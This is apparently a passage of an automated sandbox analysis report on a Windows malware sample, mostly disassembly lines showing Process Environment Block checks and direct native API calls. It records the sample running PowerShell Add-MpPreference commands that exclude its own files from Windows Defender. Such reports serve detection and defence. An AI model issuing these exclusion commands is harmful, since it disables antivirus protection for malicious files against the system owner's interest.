                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0195A49A mov eax, dword ptr fs:[00000030h]9_2_0195A49A
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A64AB mov eax, dword ptr fs:[00000030h]9_2_018A64AB
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0192A4B0 mov eax, dword ptr fs:[00000030h]9_2_0192A4B0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D44B0 mov ecx, dword ptr fs:[00000030h]9_2_018D44B0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A04E5 mov ecx, dword ptr fs:[00000030h]9_2_018A04E5
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D8402 mov eax, dword ptr fs:[00000030h]9_2_018D8402
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D8402 mov eax, dword ptr fs:[00000030h]9_2_018D8402
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D8402 mov eax, dword ptr fs:[00000030h]9_2_018D8402
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0189E420 mov eax, dword ptr fs:[00000030h]9_2_0189E420
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0189E420 mov eax, dword ptr fs:[00000030h]9_2_0189E420
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0189E420 mov eax, dword ptr fs:[00000030h]9_2_0189E420
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0189C427 mov eax, dword ptr fs:[00000030h]9_2_0189C427
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01926420 mov eax, dword ptr fs:[00000030h]9_2_01926420
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01926420 mov eax, dword ptr fs:[00000030h]9_2_01926420
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01926420 mov eax, dword ptr fs:[00000030h]9_2_01926420
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01926420 mov eax, dword ptr fs:[00000030h]9_2_01926420
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01926420 mov eax, dword ptr fs:[00000030h]9_2_01926420
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01926420 mov eax, dword ptr fs:[00000030h]9_2_01926420
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01926420 mov eax, dword ptr fs:[00000030h]9_2_01926420
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DA430 mov eax, dword ptr fs:[00000030h]9_2_018DA430
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0195A456 mov eax, dword ptr fs:[00000030h]9_2_0195A456
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DE443 mov eax, dword ptr fs:[00000030h]9_2_018DE443
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DE443 mov eax, dword ptr fs:[00000030h]9_2_018DE443
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DE443 mov eax, dword ptr fs:[00000030h]9_2_018DE443
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DE443 mov eax, dword ptr fs:[00000030h]9_2_018DE443
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DE443 mov eax, dword ptr fs:[00000030h]9_2_018DE443
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DE443 mov eax, dword ptr fs:[00000030h]9_2_018DE443
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DE443 mov eax, dword ptr fs:[00000030h]9_2_018DE443
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DE443 mov eax, dword ptr fs:[00000030h]9_2_018DE443
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0189645D mov eax, dword ptr fs:[00000030h]9_2_0189645D
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018C245A mov eax, dword ptr fs:[00000030h]9_2_018C245A
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0192C460 mov ecx, dword ptr fs:[00000030h]9_2_0192C460
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CA470 mov eax, dword ptr fs:[00000030h]9_2_018CA470
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CA470 mov eax, dword ptr fs:[00000030h]9_2_018CA470
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CA470 mov eax, dword ptr fs:[00000030h]9_2_018CA470
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0194678E mov eax, dword ptr fs:[00000030h]9_2_0194678E
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A07AF mov eax, dword ptr fs:[00000030h]9_2_018A07AF
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019547A0 mov eax, dword ptr fs:[00000030h]9_2_019547A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018AC7C0 mov eax, dword ptr fs:[00000030h]9_2_018AC7C0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019207C3 mov eax, dword ptr fs:[00000030h]9_2_019207C3
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018C27ED mov eax, dword ptr fs:[00000030h]9_2_018C27ED
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018C27ED mov eax, dword ptr fs:[00000030h]9_2_018C27ED
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018C27ED mov eax, dword ptr fs:[00000030h]9_2_018C27ED
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A47FB mov eax, dword ptr fs:[00000030h]9_2_018A47FB
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A47FB mov eax, dword ptr fs:[00000030h]9_2_018A47FB
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0192E7E1 mov eax, dword ptr fs:[00000030h]9_2_0192E7E1
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DC700 mov eax, dword ptr fs:[00000030h]9_2_018DC700
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A0710 mov eax, dword ptr fs:[00000030h]9_2_018A0710
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D0710 mov eax, dword ptr fs:[00000030h]9_2_018D0710
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0191C730 mov eax, dword ptr fs:[00000030h]9_2_0191C730
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DC720 mov eax, dword ptr fs:[00000030h]9_2_018DC720
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DC720 mov eax, dword ptr fs:[00000030h]9_2_018DC720
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D273C mov eax, dword ptr fs:[00000030h]9_2_018D273C
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D273C mov ecx, dword ptr fs:[00000030h]9_2_018D273C
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D273C mov eax, dword ptr fs:[00000030h]9_2_018D273C
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D674D mov esi, dword ptr fs:[00000030h]9_2_018D674D
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D674D mov eax, dword ptr fs:[00000030h]9_2_018D674D
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D674D mov eax, dword ptr fs:[00000030h]9_2_018D674D
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01924755 mov eax, dword ptr fs:[00000030h]9_2_01924755
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0192E75D mov eax, dword ptr fs:[00000030h]9_2_0192E75D
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A0750 mov eax, dword ptr fs:[00000030h]9_2_018A0750
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E2750 mov eax, dword ptr fs:[00000030h]9_2_018E2750
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E2750 mov eax, dword ptr fs:[00000030h]9_2_018E2750
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A8770 mov eax, dword ptr fs:[00000030h]9_2_018A8770
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0770 mov eax, dword ptr fs:[00000030h]9_2_018B0770
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0770 mov eax, dword ptr fs:[00000030h]9_2_018B0770
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0770 mov eax, dword ptr fs:[00000030h]9_2_018B0770
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0770 mov eax, dword ptr fs:[00000030h]9_2_018B0770
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0770 mov eax, dword ptr fs:[00000030h]9_2_018B0770
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0770 mov eax, dword ptr fs:[00000030h]9_2_018B0770
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0770 mov eax, dword ptr fs:[00000030h]9_2_018B0770
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0770 mov eax, dword ptr fs:[00000030h]9_2_018B0770
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0770 mov eax, dword ptr fs:[00000030h]9_2_018B0770
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0770 mov eax, dword ptr fs:[00000030h]9_2_018B0770
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0770 mov eax, dword ptr fs:[00000030h]9_2_018B0770
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0770 mov eax, dword ptr fs:[00000030h]9_2_018B0770
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A4690 mov eax, dword ptr fs:[00000030h]9_2_018A4690
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A4690 mov eax, dword ptr fs:[00000030h]9_2_018A4690
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DC6A6 mov eax, dword ptr fs:[00000030h]9_2_018DC6A6
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D66B0 mov eax, dword ptr fs:[00000030h]9_2_018D66B0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DA6C7 mov ebx, dword ptr fs:[00000030h]9_2_018DA6C7
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DA6C7 mov eax, dword ptr fs:[00000030h]9_2_018DA6C7
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0191E6F2 mov eax, dword ptr fs:[00000030h]9_2_0191E6F2
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0191E6F2 mov eax, dword ptr fs:[00000030h]9_2_0191E6F2
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0191E6F2 mov eax, dword ptr fs:[00000030h]9_2_0191E6F2
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0191E6F2 mov eax, dword ptr fs:[00000030h]9_2_0191E6F2
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019206F1 mov eax, dword ptr fs:[00000030h]9_2_019206F1
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019206F1 mov eax, dword ptr fs:[00000030h]9_2_019206F1
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B260B mov eax, dword ptr fs:[00000030h]9_2_018B260B
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B260B mov eax, dword ptr fs:[00000030h]9_2_018B260B
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B260B mov eax, dword ptr fs:[00000030h]9_2_018B260B
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B260B mov eax, dword ptr fs:[00000030h]9_2_018B260B
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B260B mov eax, dword ptr fs:[00000030h]9_2_018B260B
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B260B mov eax, dword ptr fs:[00000030h]9_2_018B260B
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B260B mov eax, dword ptr fs:[00000030h]9_2_018B260B
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E2619 mov eax, dword ptr fs:[00000030h]9_2_018E2619
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0191E609 mov eax, dword ptr fs:[00000030h]9_2_0191E609
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A262C mov eax, dword ptr fs:[00000030h]9_2_018A262C
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018BE627 mov eax, dword ptr fs:[00000030h]9_2_018BE627
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D6620 mov eax, dword ptr fs:[00000030h]9_2_018D6620
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D8620 mov eax, dword ptr fs:[00000030h]9_2_018D8620
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018BC640 mov eax, dword ptr fs:[00000030h]9_2_018BC640
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DA660 mov eax, dword ptr fs:[00000030h]9_2_018DA660
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DA660 mov eax, dword ptr fs:[00000030h]9_2_018DA660
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0196866E mov eax, dword ptr fs:[00000030h]9_2_0196866E
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0196866E mov eax, dword ptr fs:[00000030h]9_2_0196866E
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D2674 mov eax, dword ptr fs:[00000030h]9_2_018D2674
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019289B3 mov esi, dword ptr fs:[00000030h]9_2_019289B3
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019289B3 mov eax, dword ptr fs:[00000030h]9_2_019289B3
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019289B3 mov eax, dword ptr fs:[00000030h]9_2_019289B3
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A09AD mov eax, dword ptr fs:[00000030h]9_2_018A09AD
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A09AD mov eax, dword ptr fs:[00000030h]9_2_018A09AD
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B29A0 mov eax, dword ptr fs:[00000030h]9_2_018B29A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B29A0 mov eax, dword ptr fs:[00000030h]9_2_018B29A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B29A0 mov eax, dword ptr fs:[00000030h]9_2_018B29A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B29A0 mov eax, dword ptr fs:[00000030h]9_2_018B29A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B29A0 mov eax, dword ptr fs:[00000030h]9_2_018B29A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B29A0 mov eax, dword ptr fs:[00000030h]9_2_018B29A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B29A0 mov eax, dword ptr fs:[00000030h]9_2_018B29A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B29A0 mov eax, dword ptr fs:[00000030h]9_2_018B29A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B29A0 mov eax, dword ptr fs:[00000030h]9_2_018B29A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B29A0 mov eax, dword ptr fs:[00000030h]9_2_018B29A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B29A0 mov eax, dword ptr fs:[00000030h]9_2_018B29A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B29A0 mov eax, dword ptr fs:[00000030h]9_2_018B29A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B29A0 mov eax, dword ptr fs:[00000030h]9_2_018B29A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0196A9D3 mov eax, dword ptr fs:[00000030h]9_2_0196A9D3
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019369C0 mov eax, dword ptr fs:[00000030h]9_2_019369C0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018AA9D0 mov eax, dword ptr fs:[00000030h]9_2_018AA9D0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018AA9D0 mov eax, dword ptr fs:[00000030h]9_2_018AA9D0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018AA9D0 mov eax, dword ptr fs:[00000030h]9_2_018AA9D0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018AA9D0 mov eax, dword ptr fs:[00000030h]9_2_018AA9D0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018AA9D0 mov eax, dword ptr fs:[00000030h]9_2_018AA9D0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018AA9D0 mov eax, dword ptr fs:[00000030h]9_2_018AA9D0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D49D0 mov eax, dword ptr fs:[00000030h]9_2_018D49D0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0192E9E0 mov eax, dword ptr fs:[00000030h]9_2_0192E9E0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D29F9 mov eax, dword ptr fs:[00000030h]9_2_018D29F9
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D29F9 mov eax, dword ptr fs:[00000030h]9_2_018D29F9
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0192C912 mov eax, dword ptr fs:[00000030h]9_2_0192C912
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01898918 mov eax, dword ptr fs:[00000030h]9_2_01898918
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01898918 mov eax, dword ptr fs:[00000030h]9_2_01898918
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0191E908 mov eax, dword ptr fs:[00000030h]9_2_0191E908
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0191E908 mov eax, dword ptr fs:[00000030h]9_2_0191E908
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0192892A mov eax, dword ptr fs:[00000030h]9_2_0192892A
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0193892B mov eax, dword ptr fs:[00000030h]9_2_0193892B
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01920946 mov eax, dword ptr fs:[00000030h]9_2_01920946
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01974940 mov eax, dword ptr fs:[00000030h]9_2_01974940
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E096E mov eax, dword ptr fs:[00000030h]9_2_018E096E
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E096E mov edx, dword ptr fs:[00000030h]9_2_018E096E
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E096E mov eax, dword ptr fs:[00000030h]9_2_018E096E
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01944978 mov eax, dword ptr fs:[00000030h]9_2_01944978
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01944978 mov eax, dword ptr fs:[00000030h]9_2_01944978
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018C6962 mov eax, dword ptr fs:[00000030h]9_2_018C6962
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018C6962 mov eax, dword ptr fs:[00000030h]9_2_018C6962
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018C6962 mov eax, dword ptr fs:[00000030h]9_2_018C6962
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0192C97C mov eax, dword ptr fs:[00000030h]9_2_0192C97C
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A0887 mov eax, dword ptr fs:[00000030h]9_2_018A0887
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0192C89D mov eax, dword ptr fs:[00000030h]9_2_0192C89D
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CE8C0 mov eax, dword ptr fs:[00000030h]9_2_018CE8C0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019708C0 mov eax, dword ptr fs:[00000030h]9_2_019708C0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0196A8E4 mov eax, dword ptr fs:[00000030h]9_2_0196A8E4
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DC8F9 mov eax, dword ptr fs:[00000030h]9_2_018DC8F9
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DC8F9 mov eax, dword ptr fs:[00000030h]9_2_018DC8F9
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0192C810 mov eax, dword ptr fs:[00000030h]9_2_0192C810
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0194483A mov eax, dword ptr fs:[00000030h]9_2_0194483A
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0194483A mov eax, dword ptr fs:[00000030h]9_2_0194483A
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018C2835 mov eax, dword ptr fs:[00000030h]9_2_018C2835
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018C2835 mov eax, dword ptr fs:[00000030h]9_2_018C2835
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018C2835 mov eax, dword ptr fs:[00000030h]9_2_018C2835
                    Source: C:\Users\user\Desktop\UnmxRI.exe Process token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\UnmxRI.exe Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\UnmxRI.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UnmxRI.exe"
                    Source: C:\Users\user\Desktop\UnmxRI.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe"
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe NtAllocateVirtualMemory: Direct from: 0x76EF48EC
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe NtQueryAttributesFile: Direct from: 0x76EF2E6C
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe NtQuerySystemInformation: Direct from: 0x76EF48CC
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe NtOpenSection: Direct from: 0x76EF2E0C
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe NtDeviceIoControlFile: Direct from: 0x76EF2AEC
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe NtQueryValueKey: Direct from: 0x76EF2BEC
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe NtQueryInformationToken: Direct from: 0x76EF2CAC
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe NtCreateFile: Direct from: 0x76EF2FEC
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe NtOpenFile: Direct from: 0x76EF2DCC
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe NtTerminateThread: Direct from: 0x76EF2FCC
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe NtOpenKeyEx: Direct from: 0x76EF2B9C
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe NtSetInformationProcess: Direct from: 0x76EF2C5C
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe NtProtectVirtualMemory: Direct from: 0x76EF2F9C
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe NtWriteVirtualMemory: Direct from: 0x76EF2E3C
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe NtNotifyChangeKey: Direct from: 0x76EF3C2C
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe NtCreateMutant: Direct from: 0x76EF35CC
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe NtResumeThread: Direct from: 0x76EF36AC
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe NtMapViewOfSection: Direct from: 0x76EF2D1C
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe NtProtectVirtualMemory: Direct from: 0x76EE7B2E
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe NtQuerySystemInformation: Direct from: 0x76EF2DFC
